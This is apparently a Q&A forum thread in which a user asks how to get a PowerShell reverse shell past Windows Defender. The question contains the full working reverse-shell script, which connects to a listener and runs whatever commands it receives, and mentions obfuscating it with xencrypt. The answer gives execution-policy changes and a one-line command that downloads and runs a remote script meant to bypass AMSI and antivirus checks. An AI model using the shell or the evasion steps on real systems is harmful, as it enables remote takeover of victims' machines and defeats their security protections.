2

I'm trying to run a powershell reverse shell on windows 10. Anyway everytime it is blocked by Wndows Defender. How can I bypass it?

In a file I store the payload

$client = New-Object System.Net.Sockets.TCPClient('192.168.1.54',9999);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{;
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close();

then I use xencrypt to obfuscate the code but when I run powershell -NoP -NonI -W Hidden -Exec Bypass .\revshell.ps1

I get

Questo script include contenuto dannoso ed è stato bloccato dal software antivirus.
In riga:18 car:1
+ IEX($piifnga)
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand 

QUESTION: is there a way to bypass this check?

1

1 Answer 1

0
  1. open a powershell
  2. list execution policies with Get-ExecutionPolicy -List
  3. if LocalMachine is Restricted and you are not admin...
  4. ...you can change the policy locally with Set-ExecutionPolicy -Scope Process Unrestricted this allow you to execute .ps script stored on the machine...
  5. ...anyway still you can't run malicious content. So bypass AMSI with

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/aloksaurabh/OffenPowerSh/master/Bypass/Invoke-AlokS-AvBypass.ps1'); Invoke-AlokS-AvBypass

  1. Now whatever script you execute the ScriptContainedMaliciousContent message it is not longer shown
1
  • New-Object : The 'New-Object' command was found in the module 'Microsoft.PowerShell.Utility', but the module could not be loaded Commented May 5, 2021 at 16:32

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .